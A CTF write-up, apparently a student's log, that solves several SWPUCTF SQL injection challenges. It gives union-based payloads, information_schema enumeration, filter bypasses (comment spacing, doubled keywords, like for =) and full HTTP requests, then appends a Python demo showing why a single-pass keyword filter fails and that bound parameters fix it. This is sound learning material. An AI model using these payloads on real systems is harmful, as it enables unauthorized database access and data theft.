2025/12/31 19:38:16

1. [SWPUCTF 2021 Freshman Contest] easy_sql

?wllm=-1' order by 3--+
?wllm=-1' order by 4--+

Find the echo positions with ?wllm=-1' union select 1,2,3--+

?wllm=-1' union select 1,2,database()--+

The database name is test_db.

4. List the tables in the test_db database

?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+

List the columns

?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+

Read the flag

-1' union select 1,2,group_concat(id,flag) from test_tb--+


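2.

First determine the injection type.

It turns out to be 1)))))

order by shows that there are two echo positions.

Display the databases in the second echo position.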

id=1))))))%20union%20select%201,group_concat(schema_name)%20from%20information_schema.schemata%20--+

Table names

1)))))) union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctftraining' --+

The ctftraining database contains a table named flag.

Column names

1)))))) union select 1,group_concat(column_name) from information_schema.columns where table_schema='ctftraining' --+

Find the corresponding string

1)))))) UNION SELECT 1, flag FROM ctftraining.flag; --+

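3. [SWPUCTF 2021 Freshman Contest] sql
Same as before, but here a front-end hint shows that order by cannot be used.

This is because spaces, and the + sign (the special URL encoding of a space), are blocked.

In SQL injection defenses, many systems filter special characters. The + sign, a special encoding character in URLs, may also be blocked or escaped by the target system, so --+ never reaches the database intact and cannot act as a comment.

From here, start the union injection. = is also detected, so like can be used in place of =.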

?wllm=-1'union/**/select/**/1,2,3%23

Query the table names

?wllm=-1%27union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema/**/like(database())%23

Query the columns

?wllm=-1'union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name/**/like("LTLT_flag")%23


Query the flag (the output is incomplete)

?wllm=-1'union/**/select/**/1,group_concat(flag),3/**/from/**/LTLT_flag%23

NSSCTF{d064d030-12fb

Use mid to read it in segments

First part

?wllm=-1%27union/**/select/**/1,mid((select/**/flag/**/from/**/LTLT_flag),1,30),3%23

?wllm=-1'union/**/select/**/1,mid((select/**/flag/**/from/**/LTLT_flag),21,41),mid((select/**/flag/**/from/**/LTLT_flag),42,62)%23

4. [SWPUCTF 2022 Freshman Contest] ez_sql
GET request

GET /?nss=1 HTTP/1.1
Host: node5.anna.nssctf.cn:24561
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1764348351,1766929347
Upgrade-Insecure-Requests: 1
Priority: u=0, i

The page asks for the parameter to be sent via POST.

Change the request as follows

POST / HTTP/1.1
Host: node5.anna.nssctf.cn:24561
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1764348351,1766929347
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

nss=1

Find the number of columns

POST / HTTP/1.1
Host: node5.anna.nssctf.cn:24561
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1764348351,1766929347
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

nss=-1'/**/oorrder/**/by/**/4#

3 does not produce an error.

union turns out to be filtered; writing it doubled gets past the filter.

POST / HTTP/1.1
Host: node5.anna.nssctf.cn:24561
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1764348351,1766929347
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 51

nss=-1/**/uunionnion/**/select/**/1,2,database()#

POST / HTTP/1.1
Host: node5.anna.nssctf.cn:24561
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1764348351,1766929347
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

nss=nss=4'/**/ununionion/**/select/**/1,database(),3;#

POST / HTTP/1.1
Host: node5.anna.nssctf.cn:24561
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1764348351,1766929347
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 146

nss=2'/**/ununionion/**/select/**/1,database(),group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema='NSS_db';#


POST / HTTP/1.1
Host: node5.anna.nssctf.cn:24561
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1764348351,1766929347
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 146

nss=2'/**/ununionion/**/select/**/1,database(),group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_name='NSS_tb';#

POST / HTTP/1.1
Host: node5.anna.nssctf.cn:24561
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1764348351,1766929347
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

nss=2'/**/ununionion/**/select/**/1,group_concat(Secr3t),group_concat(flll444g)/**/from/**/NSS_tb;#
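Why the doubled keywords in challenge 4 get through, and what closes the hole, shown as an added example that is not part of the original write-up or the challenge's source. It assumes the filter deletes each blocked keyword once in a single pass; `strip_once`, the `items` table and the sample data are hypothetical, and SQLite stands in for the challenge's MySQL.

```python
import re
import sqlite3

# Assumption: the challenge filter deletes each keyword once, in a single pass.
# This is a hypothetical reconstruction, not the challenge's source code.
BLOCKED = ("union", "or")

def strip_once(value):
    for word in BLOCKED:
        value = re.sub(word, "", value, flags=re.IGNORECASE)
    return value

def make_db():
    # Constructed in-memory data; only the table/column names come from the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id TEXT, a TEXT, b TEXT)")
    db.execute("CREATE TABLE NSS_tb (flll444g TEXT)")
    db.execute("INSERT INTO items VALUES ('1', 'x', 'y')")
    db.execute("INSERT INTO NSS_tb VALUES ('constructed-secret')")
    return db

def lookup_filtered(db, nss):
    # Vulnerable pattern: filter the value, then concatenate it into the SQL text.
    sql = "SELECT id, a, b FROM items WHERE id = '" + strip_once(nss) + "'"
    return db.execute(sql).fetchall()

def lookup_bound(db, nss):
    # Hardened form: the value is bound as data and is never parsed as SQL.
    return db.execute("SELECT id, a, b FROM items WHERE id = ?", (nss,)).fetchall()

# Constructed input in the shape of the page's payloads; "--" replaces "#"
# because SQLite has no "#" comment.
SAMPLE = "-1'/**/ununionion/**/select/**/1,2,flll444g/**/from/**/NSS_tb--"

if __name__ == "__main__":
    db = make_db()
    # Deleting the inner keyword leaves the outer letters to re-form it.
    print(strip_once("oorrder"), strip_once("infoorrmation_schema"))
    print(lookup_filtered(db, SAMPLE))  # row from NSS_tb comes back
    print(lookup_bound(db, SAMPLE))     # no rows: compared as a plain string
    print(lookup_bound(db, "1"))        # legitimate lookup still works
```

The fix is to bind the value rather than to improve the blocklist: a filter that loops until nothing changes still leaves the query built by string concatenation.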
